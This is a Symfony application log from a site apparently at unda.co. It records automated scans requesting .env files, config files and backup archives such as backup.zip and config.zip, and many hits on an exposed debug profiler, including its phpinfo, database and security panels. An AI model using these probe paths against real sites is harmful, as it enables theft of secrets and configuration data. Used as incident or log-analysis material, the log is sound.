[2025-12-20 20:56:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/config/environment.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/config/environment.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /staging/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /staging/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /stg/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /stg/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:56:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:57:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:57:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:57:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:57:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:58:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e","method":"GET"} []
[2025-12-20 20:58:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 21:01:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc1c8b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cc1c8b","method":"GET"} []
[2025-12-20 21:01:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 21:05:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"53b09b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/53b09b?panel=request","method":"GET"} []
[2025-12-20 21:05:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 21:08:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=twig","method":"GET"} []
[2025-12-20 21:08:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 21:11:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 21:11:50] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-20 21:13:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 21:14:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=config","method":"GET"} []
[2025-12-20 21:14:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 21:17:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:17:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:18:52] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 21:25:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:25:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 21:29:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:30:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=time","method":"GET"} []
[2025-12-20 21:30:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 21:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:30:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=security","method":"GET"} []
[2025-12-20 21:30:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 21:30:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=db","method":"GET"} []
[2025-12-20 21:30:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bak.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bak.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /experimental.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /experimental.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
